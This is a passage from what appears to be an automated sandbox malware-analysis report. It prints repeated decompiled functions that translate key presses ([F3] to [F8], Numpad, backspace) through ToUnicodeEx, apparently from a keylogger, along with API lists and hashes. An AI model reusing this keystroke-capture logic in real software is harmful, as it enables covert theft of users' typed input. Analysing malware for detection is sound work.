							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100074b9
0x100074b9
0x100074c0
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[F3], xrefs: 100074BB

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F3]
API String ID: 783433895-335784001
Opcode ID: 80c9ce260dae226eb44177270cdbf564c4ea894a5715ee9831f10be66ef7018d
Instruction ID: 5ffa793185ddc03e6bd9b518dcc1c3a840d5d258ef7404ebf5977b295413e047
Opcode Fuzzy Hash: 80c9ce260dae226eb44177270cdbf564c4ea894a5715ee9831f10be66ef7018d
Instruction Fuzzy Hash: 3031BEB8B042545BF722CB658C45B9F73A9FB882C0F50C0A5F6489720ECA78EE458B61

Uniqueness

Uniqueness Score: -1.00%

Function 100074CA, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100074CA(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F4]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100074ca
0x100074ca
0x100074d1
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[F4], xrefs: 100074CC

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F4]
API String ID: 783433895-1531068038
Opcode ID: 6d9a0e9fbebd9a50c8bcb9db2712b1e2ac49f4d56deef2cfada9a671fa5fc202
Instruction ID: 257b764002efa9c4341bee291622735cee0b2dcf4ecee3ad542065e968f39148
Opcode Fuzzy Hash: 6d9a0e9fbebd9a50c8bcb9db2712b1e2ac49f4d56deef2cfada9a671fa5fc202
Instruction Fuzzy Hash: 5D31C0B8F042545BF722CB658C85B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100074DB, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100074DB(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F5]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100074db
0x100074db
0x100074e2
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[F5], xrefs: 100074DD

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F5]
API String ID: 783433895-1113132999
Opcode ID: f81663136670eefa6b559e0c3c47de8a84feb9d0a987ea63e8a80dbafee9e838
Instruction ID: e633cb04462a412f5613c9ae028300c402083a262aa70dec723c73e3e1fc98dc
Opcode Fuzzy Hash: f81663136670eefa6b559e0c3c47de8a84feb9d0a987ea63e8a80dbafee9e838
Instruction Fuzzy Hash: 8131C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100074EC, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100074EC(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F6]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100074ec
0x100074ec
0x100074f3
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[F6], xrefs: 100074EE

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F6]
API String ID: 783433895-1769233412
Opcode ID: de0a920129dad26d8c4fe0b58c73f8f855b5dba485b07b544234d7fa5c6e68d1
Instruction ID: 06c9bff7c49a7ca2c2341c9269cfae46da6e7e947720c8e577cceb00dd52d8a3
Opcode Fuzzy Hash: de0a920129dad26d8c4fe0b58c73f8f855b5dba485b07b544234d7fa5c6e68d1
Instruction Fuzzy Hash: 9F31C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100074FD, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100074FD(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F7]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100074fd
0x100074fd
0x10007504
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[F7], xrefs: 100074FF

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F7]
API String ID: 783433895-1886350661
Opcode ID: 345da217220ec433c981a36fa361fc3ad81173d5edecf30b3bf0f3c1a6518443
Instruction ID: 73602d54f96144a7c61c9f0aea61f9d03e1029ed712db4d82cb90836cee0ee4d
Opcode Fuzzy Hash: 345da217220ec433c981a36fa361fc3ad81173d5edecf30b3bf0f3c1a6518443
Instruction Fuzzy Hash: 7E31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1000750E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E1000750E(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F8]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x1000750e
0x1000750e
0x10007515
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[F8], xrefs: 10007510

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F8]
API String ID: 783433895-4160188810
Opcode ID: 269bc51cce26e08b7987e5e807f60e6eca6bbb1954024bbcceed0e0ae58e0d67
Instruction ID: f8e9f27ca4e45bd5c8ec38f2eac8d4937add76fc56490cf5c4d7db7a8d0d77db
